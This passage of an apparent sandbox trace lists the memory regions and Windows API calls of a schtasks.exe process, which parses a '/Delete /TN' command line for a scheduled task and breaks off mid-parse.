start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2095
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2096
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2097
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2098
start_va = 0x7fefaa30000
end_va = 0x7fefaa39fff
monitored = 0
entry_point = 0x7fefaa3260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 2099
start_va = 0x2c0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 2100
start_va = 0x2c0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 2101
start_va = 0x3c0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003c0000"
filename = ""
Region:
id = 2102
start_va = 0x50000
end_va = 0x78fff
monitored = 0
entry_point = 0x51010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2103
start_va = 0x80000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 2104
start_va = 0x3d0000
end_va = 0x557fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 2105
start_va = 0x50000
end_va = 0x78fff
monitored = 0
entry_point = 0x51010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2106
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2107
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2108
start_va = 0x560000
end_va = 0x6e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 2109
start_va = 0x6f0000
end_va = 0x1aeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006f0000"
filename = ""
Region:
id = 2110
start_va = 0x50000
end_va = 0x61fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\System32\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\schtasks.exe.mui")
Region:
id = 2125
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 2126
start_va = 0x180000
end_va = 0x180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 2127
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2128
start_va = 0x1af0000
end_va = 0x1dbefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2148
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2149
start_va = 0x1dc0000
end_va = 0x1e3cfff
monitored = 0
entry_point = 0x1dccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2150
start_va = 0x1f60000
end_va = 0x1fdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 2151
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 2152
start_va = 0x1dc0000
end_va = 0x1e3cfff
monitored = 0
entry_point = 0x1dccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2153
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2154
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2155
start_va = 0x1dc0000
end_va = 0x1e7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001dc0000"
filename = ""
Region:
id = 2156
start_va = 0x1e80000
end_va = 0x1f5efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e80000"
filename = ""
Region:
id = 2157
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2158
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 2159
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2160
start_va = 0x1a0000
end_va = 0x1a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 2161
start_va = 0x7fefb530000
end_va = 0x7fefb656fff
monitored = 0
entry_point = 0x7fefb5310ec
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 2162
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Thread:
id = 105
os_tid = 0xca4
[0379.915] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f7f0 | out: lpSystemTimeAsFileTime=0x24f7f0*(dwLowDateTime=0xfa7dae40, dwHighDateTime=0x1dab598))
[0379.915] GetCurrentProcessId () returned 0xce4
[0379.915] GetCurrentThreadId () returned 0xca4
[0379.915] GetTickCount () returned 0x1427313
[0379.915] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x24f7f8 | out: lpPerformanceCount=0x24f7f8*=2126061250440) returned 1
[0379.916] GetModuleHandleW (lpModuleName=0x0) returned 0xffa50000
[0379.916] __set_app_type (_Type=0x1)
[0379.916] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffa7972c) returned 0x0
[0379.917] __wgetmainargs (in: _Argc=0xffa91240, _Argv=0xffa91250, _Env=0xffa91248, _DoWildCard=0, _StartInfo=0xffa9125c | out: _Argc=0xffa91240, _Argv=0xffa91250, _Env=0xffa91248) returned 0
[0379.918] _onexit (_Func=0xffa82ab0) returned 0xffa82ab0
[0379.918] _onexit (_Func=0xffa82ac4) returned 0xffa82ac4
[0379.919] _onexit (_Func=0xffa82afc) returned 0xffa82afc
[0379.919] _onexit (_Func=0xffa82b58) returned 0xffa82b58
[0379.919] _onexit (_Func=0xffa82b80) returned 0xffa82b80
[0379.920] _onexit (_Func=0xffa82ba8) returned 0xffa82ba8
[0379.920] _onexit (_Func=0xffa82bd0) returned 0xffa82bd0
[0379.920] _onexit (_Func=0xffa82bf8) returned 0xffa82bf8
[0379.921] _onexit (_Func=0xffa82c20) returned 0xffa82c20
[0379.921] _onexit (_Func=0xffa82c48) returned 0xffa82c48
[0379.921] _onexit (_Func=0xffa82c70) returned 0xffa82c70
[0379.922] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0379.922] WinSqmIsOptedIn () returned 0x0
[0379.923] GetProcessHeap () returned 0x80000
[0379.923] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9ba40
[0379.923] SetLastError (dwErrCode=0x0)
[0379.923] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0379.923] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0379.924] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0379.924] VerifyVersionInfoW (in: lpVersionInformation=0x24efb0, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x24efb0) returned 1
[0379.924] GetProcessHeap () returned 0x80000
[0379.924] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9ba60
[0379.924] lstrlenW (lpString="") returned 0
[0379.924] GetProcessHeap () returned 0x80000
[0379.924] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x2) returned 0x9ba80
[0379.924] GetProcessHeap () returned 0x80000
[0379.924] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x959f0
[0379.924] GetProcessHeap () returned 0x80000
[0379.924] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9baa0
[0379.924] GetProcessHeap () returned 0x80000
[0379.924] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95a20
[0379.924] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95a50
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95a80
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95ab0
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9bac0
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95ae0
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95b10
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95b40
[0379.925] GetProcessHeap () returned 0x80000
[0379.925] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95b70
[0379.926] GetProcessHeap () returned 0x80000
[0379.926] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9bae0
[0379.926] GetProcessHeap () returned 0x80000
[0379.926] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95ba0
[0379.926] GetProcessHeap () returned 0x80000
[0379.926] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95bd0
[0379.926] GetProcessHeap () returned 0x80000
[0379.926] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95c00
[0379.926] GetProcessHeap () returned 0x80000
[0379.926] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95c30
[0379.926] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0379.929] SetLastError (dwErrCode=0x0)
[0379.929] GetProcessHeap () returned 0x80000
[0379.929] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95c60
[0379.929] GetProcessHeap () returned 0x80000
[0379.929] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95c90
[0379.929] GetProcessHeap () returned 0x80000
[0379.930] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95cc0
[0379.930] GetProcessHeap () returned 0x80000
[0379.930] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95cf0
[0379.930] GetProcessHeap () returned 0x80000
[0379.930] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x95d20
[0379.930] GetProcessHeap () returned 0x80000
[0379.930] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9bb00
[0379.930] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0379.930] GetProcessHeap () returned 0x80000
[0379.930] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x208) returned 0x9bca0
[0379.930] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9bca0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0379.931] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefc990000
[0379.933] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoSizeW") returned 0x7fefc9915fc
[0379.933] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0379.936] GetProcessHeap () returned 0x80000
[0379.936] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x74e) returned 0x9c270
[0379.936] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoW") returned 0x7fefc991614
[0379.936] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x9c270 | out: lpData=0x9c270) returned 1
[0379.937] GetProcAddress (hModule=0x7fefc990000, lpProcName="VerQueryValueW") returned 0x7fefc9915e0
[0379.937] VerQueryValueW (in: pBlock=0x9c270, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24f098, puLen=0x24f100 | out: lplpBuffer=0x24f098*=0x9c60c, puLen=0x24f100) returned 1
[0379.941] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0379.941] _vsnwprintf (in: _Buffer=0x9bca0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x24f078 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0379.941] VerQueryValueW (in: pBlock=0x9c270, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x24f108, puLen=0x24f0f8 | out: lplpBuffer=0x24f108*=0x9c438, puLen=0x24f0f8) returned 1
[0379.941] lstrlenW (lpString="schtasks.exe") returned 12
[0379.941] lstrlenW (lpString="schtasks.exe") returned 12
[0379.941] lstrlenW (lpString=".EXE") returned 4
[0379.941] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0380.363] lstrlenW (lpString="schtasks.exe") returned 12
[0380.363] lstrlenW (lpString=".EXE") returned 4
[0380.363] _memicmp (_Buf1=0x9bb00, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.364] lstrlenW (lpString="schtasks") returned 8
[0380.364] GetProcessHeap () returned 0x80000
[0380.364] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cb80
[0380.364] GetProcessHeap () returned 0x80000
[0380.364] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cbb0
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cbe0
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cc10
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9bb20
[0380.365] _memicmp (_Buf1=0x9bb20, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0xa0) returned 0x9c0a0
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cc40
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cc70
[0380.365] GetProcessHeap () returned 0x80000
[0380.365] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0x9cca0
[0380.366] GetProcessHeap () returned 0x80000
[0380.366] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9bb40
[0380.366] _memicmp (_Buf1=0x9bb40, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.366] GetProcessHeap () returned 0x80000
[0380.366] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x200) returned 0x9d350
[0380.366] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x9d350, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0380.367] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0380.367] GetProcessHeap () returned 0x80000
[0380.367] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x30) returned 0x97c50
[0380.367] _vsnwprintf (in: _Buffer=0x9c0a0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x24f078 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0380.367] GetProcessHeap () returned 0x80000
[0380.367] GetProcessHeap () returned 0x80000
[0380.367] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270) returned 1
[0380.367] GetProcessHeap () returned 0x80000
[0380.367] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c270) returned 0x74e
[0380.368] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270 | out: hHeap=0x80000) returned 1
[0380.368] SetLastError (dwErrCode=0x0)
[0380.368] GetThreadLocale () returned 0x409
[0380.368] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.369] lstrlenW (lpString="?") returned 1
[0380.369] GetThreadLocale () returned 0x409
[0380.369] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.369] lstrlenW (lpString="create") returned 6
[0380.369] GetThreadLocale () returned 0x409
[0380.369] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.369] lstrlenW (lpString="delete") returned 6
[0380.369] GetThreadLocale () returned 0x409
[0380.369] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.369] lstrlenW (lpString="query") returned 5
[0380.369] GetThreadLocale () returned 0x409
[0380.369] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.370] lstrlenW (lpString="change") returned 6
[0380.370] GetThreadLocale () returned 0x409
[0380.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.370] lstrlenW (lpString="run") returned 3
[0380.370] GetThreadLocale () returned 0x409
[0380.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.370] lstrlenW (lpString="end") returned 3
[0380.370] GetThreadLocale () returned 0x409
[0380.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.370] lstrlenW (lpString="showsid") returned 7
[0380.370] GetThreadLocale () returned 0x409
[0380.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0380.370] SetLastError (dwErrCode=0x0)
[0380.370] SetLastError (dwErrCode=0x0)
[0380.370] lstrlenW (lpString="/Delete") returned 7
[0380.371] lstrlenW (lpString="-/") returned 2
[0380.371] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.371] lstrlenW (lpString="?") returned 1
[0380.371] lstrlenW (lpString="?") returned 1
[0380.371] GetProcessHeap () returned 0x80000
[0380.371] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9c150
[0380.371] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.371] GetProcessHeap () returned 0x80000
[0380.371] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0xa) returned 0x9c270
[0380.372] lstrlenW (lpString="Delete") returned 6
[0380.372] GetProcessHeap () returned 0x80000
[0380.372] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0x9c290
[0380.372] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.372] GetProcessHeap () returned 0x80000
[0380.372] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x14) returned 0x9c2b0
[0380.372] _vsnwprintf (in: _Buffer=0x9c270, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|?|") returned 3
[0380.372] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|Delete|") returned 8
[0380.372] lstrlenW (lpString="|?|") returned 3
[0380.372] lstrlenW (lpString="|Delete|") returned 8
[0380.372] SetLastError (dwErrCode=0x490)
[0380.372] lstrlenW (lpString="create") returned 6
[0380.372] lstrlenW (lpString="create") returned 6
[0380.372] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.373] GetProcessHeap () returned 0x80000
[0380.373] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270) returned 1
[0380.373] GetProcessHeap () returned 0x80000
[0380.373] RtlReAllocateHeap (Heap=0x80000, Flags=0xc, Ptr=0x9c270, Size=0x14) returned 0x9c2d0
[0380.373] lstrlenW (lpString="Delete") returned 6
[0380.373] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.373] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|create|") returned 8
[0380.373] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|Delete|") returned 8
[0380.373] lstrlenW (lpString="|create|") returned 8
[0380.373] lstrlenW (lpString="|Delete|") returned 8
[0380.373] StrStrIW (lpFirst="|create|", lpSrch="|Delete|") returned 0x0
[0380.374] SetLastError (dwErrCode=0x490)
[0380.374] lstrlenW (lpString="delete") returned 6
[0380.374] lstrlenW (lpString="delete") returned 6
[0380.374] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.374] lstrlenW (lpString="Delete") returned 6
[0380.374] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.374] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|delete|") returned 8
[0380.374] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|Delete|") returned 8
[0380.374] lstrlenW (lpString="|delete|") returned 8
[0380.374] lstrlenW (lpString="|Delete|") returned 8
[0380.374] StrStrIW (lpFirst="|delete|", lpSrch="|Delete|") returned="|delete|"
[0380.374] SetLastError (dwErrCode=0x0)
[0380.374] SetLastError (dwErrCode=0x0)
[0380.374] SetLastError (dwErrCode=0x0)
[0380.375] lstrlenW (lpString="/TN") returned 3
[0380.375] lstrlenW (lpString="-/") returned 2
[0380.375] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.375] lstrlenW (lpString="?") returned 1
[0380.375] lstrlenW (lpString="?") returned 1
[0380.375] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.375] lstrlenW (lpString="TN") returned 2
[0380.375] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.375] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|?|") returned 3
[0380.375] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.375] lstrlenW (lpString="|?|") returned 3
[0380.375] lstrlenW (lpString="|TN|") returned 4
[0380.375] SetLastError (dwErrCode=0x490)
[0380.375] lstrlenW (lpString="create") returned 6
[0380.376] lstrlenW (lpString="create") returned 6
[0380.376] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.376] lstrlenW (lpString="TN") returned 2
[0380.376] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.376] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|create|") returned 8
[0380.376] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.376] lstrlenW (lpString="|create|") returned 8
[0380.376] lstrlenW (lpString="|TN|") returned 4
[0380.376] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0380.376] SetLastError (dwErrCode=0x490)
[0380.376] lstrlenW (lpString="delete") returned 6
[0380.376] lstrlenW (lpString="delete") returned 6
[0380.376] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.377] lstrlenW (lpString="TN") returned 2
[0380.377] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.377] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|delete|") returned 8
[0380.377] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f088 | out: _Buffer="|TN|") returned 4
[0380.377] lstrlenW (lpString="|delete|") returned 8
[0380.377] lstrlenW (lpString="|TN|") returned 4
[0380.377] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0380.377] SetLastError (dwErrCode=0x490)
[0380.377] lstrlenW (lpString="query") returned 5
[0380.377] lstrlenW (lpString="query") returned 5
[0380.377] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.377] lstrlenW (lpString="TN") returned 2
[0380.378] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
